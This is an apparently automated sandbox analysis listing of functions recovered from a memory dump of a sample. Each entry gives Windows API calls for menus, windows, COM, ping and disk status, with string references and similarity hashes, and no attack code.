Function 00207152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0020716A
CreateMenu.USER32 ref: 00207185
SetMenu.USER32(?,00000000), ref: 00207194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00207221
IsMenu.USER32(?), ref: 00207237
CreatePopupMenu.USER32 ref: 00207241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0020726E
DrawMenuBar.USER32 ref: 00207276

Strings

F, xrefs: 00207262
0, xrefs: 00207160

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 9a189192c382c63d7958df654b53ca2057f535f9db8119ae287aa1554612bb22
Instruction ID: 91b0c96c2eb661465356a7189b67ef622b446572ffd54078b791a0de9c188ef6
Opcode Fuzzy Hash: 9a189192c382c63d7958df654b53ca2057f535f9db8119ae287aa1554612bb22
Instruction Fuzzy Hash: 90412879A11305EFDB60DF64E988E9ABBB5FF49310F144029FD45973A2D731A920CB90

Function 002074BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0020755E
CreateCompatibleDC.GDI32(00000000), ref: 00207565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00207578
SelectObject.GDI32(00000000,00000000), ref: 00207580
GetPixel.GDI32(00000000,00000000,00000000), ref: 0020758B
DeleteDC.GDI32(00000000), ref: 00207594
GetWindowLongW.USER32(?,000000EC), ref: 0020759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 002075B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 002075BE

Strings

static, xrefs: 002074F6

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 994c4403baf145f8c3c03576b6abd1500791bea40dc232028a19b64d9b31635a
Instruction ID: 88b22f31f298567488aa6303119177144fd930144867a02ca992a6f50681bd09
Opcode Fuzzy Hash: 994c4403baf145f8c3c03576b6abd1500791bea40dc232028a19b64d9b31635a
Instruction Fuzzy Hash: 2B317872554315ABDF229F64EC48FDA3F69EF09320F100224FA15A20E2C731E821DBA4

Function 001A6E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001A6E3E

Part of subcall function 001A8B28: __getptd_noexit.LIBCMT ref: 001A8B28

__gmtime64_s.LIBCMT ref: 001A6ED7
__gmtime64_s.LIBCMT ref: 001A6F0D
__gmtime64_s.LIBCMT ref: 001A6F2A
__allrem.LIBCMT ref: 001A6F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001A6F9C
__allrem.LIBCMT ref: 001A6FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001A6FD1
__allrem.LIBCMT ref: 001A6FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001A7006
__invoke_watson.LIBCMT ref: 001A7077

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: c516032f866d67fa98a400f982a549918f4b6cb8661fddbf0fdefebf51c4a76a
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: 1F71087AA00B16ABD714EF78DC41BAAB7A8AF16720F148229F514D76C1F770DE108BD0

Function 001E2527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001E2542
GetMenuItemInfoW.USER32(00245890,000000FF,00000000,00000030), ref: 001E25A3
SetMenuItemInfoW.USER32(00245890,00000004,00000000,00000030), ref: 001E25D9
Sleep.KERNEL32(000001F4), ref: 001E25EB
GetMenuItemCount.USER32(?), ref: 001E262F
GetMenuItemID.USER32(?,00000000), ref: 001E264B
GetMenuItemID.USER32(?,-00000001), ref: 001E2675
GetMenuItemID.USER32(?,?), ref: 001E26BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 001E2700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001E2714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001E2735

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 42a99f11607a07666c59c9ea7d12f5dccb6f56ce7164dfefcd99dec32e5ba454
Instruction ID: 020c7c533738238184b305069d44c9f326d5470189fd4c7dcb33cd553cc72736
Opcode Fuzzy Hash: 42a99f11607a07666c59c9ea7d12f5dccb6f56ce7164dfefcd99dec32e5ba454
Instruction Fuzzy Hash: D661CEB0900A89AFDB21CFA6DDA8DBE7BBCFB55304F140169E842A3251D771AD05CB20

Function 00206F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00206FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00206FA8
GetWindowLongW.USER32(?,000000F0), ref: 00206FCC
_memset.LIBCMT ref: 00206FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00206FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00207067

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 64b1ad2dd01aacc4cba6e748ce5c1370ba6b3709735a92e550413df59519d3e2
Instruction ID: 0cde254b8afb13c5740512e125c739b03feab9c420a8325d79772be754496c28
Opcode Fuzzy Hash: 64b1ad2dd01aacc4cba6e748ce5c1370ba6b3709735a92e550413df59519d3e2
Instruction Fuzzy Hash: CD617B75910319AFDB11DFA4CC85EEEB7B8EB09710F100169FA15AB2E2C771AD51CB90

Function 001D6B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 001D6BBF
SafeArrayAllocData.OLEAUT32(?), ref: 001D6C18
VariantInit.OLEAUT32(?), ref: 001D6C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 001D6C4A
VariantCopy.OLEAUT32(?,?), ref: 001D6C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 001D6CB1
VariantClear.OLEAUT32(?), ref: 001D6CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 001D6CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001D6CDC
VariantClear.OLEAUT32(?), ref: 001D6CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001D6CF9

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 273cf78ffc279788e6f175e519270c574f028c0711e85cf5391c247b3915e8eb
Instruction ID: 85542f370c2530527a76c4cedde8e9d608eda3479bf2a167e34f4eb28cbbd279
Opcode Fuzzy Hash: 273cf78ffc279788e6f175e519270c574f028c0711e85cf5391c247b3915e8eb
Instruction Fuzzy Hash: 0F416671A002199FCF10DFA8D9889EEBBB9FF18354F008066E955E7361CB30A945CF90

Function 001F83BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00189837: __itow.LIBCMT ref: 00189862
Part of subcall function 00189837: __swprintf.LIBCMT ref: 001898AC

CoInitialize.OLE32 ref: 001F8403
CoUninitialize.OLE32 ref: 001F840E
CoCreateInstance.OLE32(?,00000000,00000017,00212BEC,?), ref: 001F846E
IIDFromString.OLE32(?,?), ref: 001F84E1
VariantInit.OLEAUT32(?), ref: 001F857B
VariantClear.OLEAUT32(?), ref: 001F85DC

Strings

Failed to create object, xrefs: 001F8479, 001F852F
NULL Pointer assignment, xrefs: 001F84B3
Invalid parameter, xrefs: 001F84FA

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 5f34e0e24c3a9b7849bdb2fd0ffabb027d23a43bff7ad65e9755b17c2fae6688
Instruction ID: cfa18918e59ad121ddffb4092698a76b287accfb6de32d839804bb548b0516d1
Opcode Fuzzy Hash: 5f34e0e24c3a9b7849bdb2fd0ffabb027d23a43bff7ad65e9755b17c2fae6688
Instruction Fuzzy Hash: 9461D0706087169FC714EF24D848F6EB7E8AF49714F044819FA819B2A1CB70EE48CB92

Function 001F5732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 001F5793
inet_addr.WSOCK32(?,?,?), ref: 001F57D8
gethostbyname.WSOCK32(?), ref: 001F57E4
IcmpCreateFile.IPHLPAPI ref: 001F57F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 001F5862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 001F5878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 001F58ED
WSACleanup.WSOCK32 ref: 001F58F3

Strings

Ping, xrefs: 001F5816

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 11da1659764f0f712df378b498e44fadc0551da12d79c71ec501044eda1bf20a
Instruction ID: 5a0f74cfbe7a754bd0019cf66e5be50600e7362814a16f20acd4d19bc71d1792
Opcode Fuzzy Hash: 11da1659764f0f712df378b498e44fadc0551da12d79c71ec501044eda1bf20a
Instruction Fuzzy Hash: 85516C31604704EFD720EF25DC89B2AB7E5EF49750F044929FA5ADB2A1DB70E900DB42

Function 001EB4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 001EB4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 001EB546
GetLastError.KERNEL32 ref: 001EB550
SetErrorMode.KERNEL32(00000000,READY), ref: 001EB5BD

Strings

NOTREADY, xrefs: 001EB57C
READONLY, xrefs: 001EB588
UNKNOWN, xrefs: 001EB575
READY, xrefs: 001EB596
INVALID, xrefs: 001EB58F

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: d62765b0448ab4ddb02e50d7acf2a4e5d5fd7bf4a66a40b187002d169c1a037b
Instruction ID: 5d238d2091fdbc99904facb63a50c698d3249cb1b0402cba2c9d3649cecb23ff
Opcode Fuzzy Hash: d62765b0448ab4ddb02e50d7acf2a4e5d5fd7bf4a66a40b187002d169c1a037b
Instruction Fuzzy Hash: 6B31CF75A04749DFCB10EB69D885ABEBBB4FF19314F144026F505DB291DB709A42CB90

Function 001D8F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00187DE1: _memmove.LIBCMT ref: 00187E22

Part of subcall function 001DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 001DAABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 001D9014
GetDlgCtrlID.USER32 ref: 001D901F
GetParent.USER32 ref: 001D903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 001D903E
GetDlgCtrlID.USER32(?), ref: 001D9047
GetParent.USER32(?), ref: 001D9063
SendMessageW.USER32(00000000,?,?,00000111), ref: 001D9066

Strings

ListBox, xrefs: 001D8FD1
ComboBox, xrefs: 001D8F9C

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: f4a64b3bbb1178a700981346517a00d72068171099eb16e560c4d7ff777bc96f
Instruction ID: cc1580cb46ef4df54c3162aa8d0a884d2675a9bc77f3d0a79450a75b0f3b9c77
Opcode Fuzzy Hash: f4a64b3bbb1178a700981346517a00d72068171099eb16e560c4d7ff777bc96f
Instruction Fuzzy Hash: 0521C474A00208BBDF14EBA0DC89EFEBB79EF55310F104216F921972A2DB759915DF20

Function 001D907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00187DE1: _memmove.LIBCMT ref: 00187E22

Part of subcall function 001DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 001DAABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 001D90FD
GetDlgCtrlID.USER32 ref: 001D9108
GetParent.USER32 ref: 001D9124
SendMessageW.USER32(00000000,?,00000111,?), ref: 001D9127
GetDlgCtrlID.USER32(?), ref: 001D9130
GetParent.USER32(?), ref: 001D914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 001D914F

Strings

ListBox, xrefs: 001D90BC
ComboBox, xrefs: 001D9087

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: e466e7c6c88d4b3d13f7069c5aa4f60480e91b4f17865c830a02f960659631c3
Instruction ID: f2ee0e3cec5e09bc57cc62bee36e8825d16cedb700b71ce28944564efce6527d
Opcode Fuzzy Hash: e466e7c6c88d4b3d13f7069c5aa4f60480e91b4f17865c830a02f960659631c3
Instruction Fuzzy Hash: 3221F574A40208BBDF10ABA0DC89EFEBB78EF58300F500116F921972A2DB759919DF20

Function 001D9163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 001D916F
GetClassNameW.USER32(00000000,?,00000100), ref: 001D9184
_wcscmp.LIBCMT ref: 001D9196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 001D9211

Strings

SHELLDLL_DefView, xrefs: 001D9190
smallicons, xrefs: 001D91D9
details, xrefs: 001D91BF
largeicons, xrefs: 001D91A5
list, xrefs: 001D91F3

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: fed44af06c9517a3901fd2d3cafb6217f5eccc5eb723c1a3cf921ea3ca582eb5
Instruction ID: a915cb39c7c694a31bde431050f53445bbfb12ca68615f6cf9d0ddc7783b1b40
Opcode Fuzzy Hash: fed44af06c9517a3901fd2d3cafb6217f5eccc5eb723c1a3cf921ea3ca582eb5
Instruction Fuzzy Hash: 391120BA28830775FE252628EC0AEA7379C9B16730F200127F910E55D2FF6198615954

Function 001E7990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 001E7A6C

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 531ae7026b206e70df750dc01b3cbd7a5dc79dcd73ad312595c3ab63caa2e635
Instruction ID: 58c2d9db72e6a1d698b1a61b76dc2360677f46cd7f380f87cc3e51d1b5193f5e
Opcode Fuzzy Hash: 531ae7026b206e70df750dc01b3cbd7a5dc79dcd73ad312595c3ab63caa2e635
Instruction Fuzzy Hash: 7CB1D37190464A9FEB10DFA6D884BBEB7F8FF09324F254469EA01E7281D734E941CB90

Function 001E11CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 001E11F0
GetForegroundWindow.USER32(00000000,?,?,?,?,?,001E0268,?,00000001), ref: 001E1204
GetWindowThreadProcessId.USER32(00000000), ref: 001E120B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001E0268,?,00000001), ref: 001E121A
GetWindowThreadProcessId.USER32(?,00000000), ref: 001E122C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001E0268,?,00000001), ref: 001E1245
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001E0268,?,00000001), ref: 001E1257
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,001E0268,?,00000001), ref: 001E129C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,001E0268,?,00000001), ref: 001E12B1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,001E0268,?,00000001), ref: 001E12BC

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 7719c26ceaf99369d662c9ab8c44c37f7c48f50528cfb640cc0390f808c0ca76
Instruction ID: f4a1482913d0819fde7f74b5c203d2d384b2df4f57e08d2a711c676bab97272a
Opcode Fuzzy Hash: 7719c26ceaf99369d662c9ab8c44c37f7c48f50528cfb640cc0390f808c0ca76
Instruction Fuzzy Hash: 8E31FB39600705BBDB208F22FD8CFAD77A8BB66301F214124FA02C66A1C7B09D448F62

Function 0018FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0018FAA6
OleUninitialize.OLE32(?,00000000), ref: 0018FB45
UnregisterHotKey.USER32(?), ref: 0018FC9C
DestroyWindow.USER32(?), ref: 001C45D6
FreeLibrary.KERNEL32(?), ref: 001C463B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 001C4668

Strings

close all, xrefs: 0018FAA1

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 0d142a0db009c22111db1da62c746652ac632ddd9e8aef43a2996100d237a1a0
Instruction ID: f34dc2dce364c15b54664134cd9aa00c16f83ea0fd15a207b8a1910d6ddf29d7
Opcode Fuzzy Hash: 0d142a0db009c22111db1da62c746652ac632ddd9e8aef43a2996100d237a1a0
Instruction Fuzzy Hash: 1DA17C34705222CFCB29EF14C5A4F69F364AF25710F5542ADE80AAB262DB30EE16CF50

Function 001F9113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON

Download Yara Rule

APIs

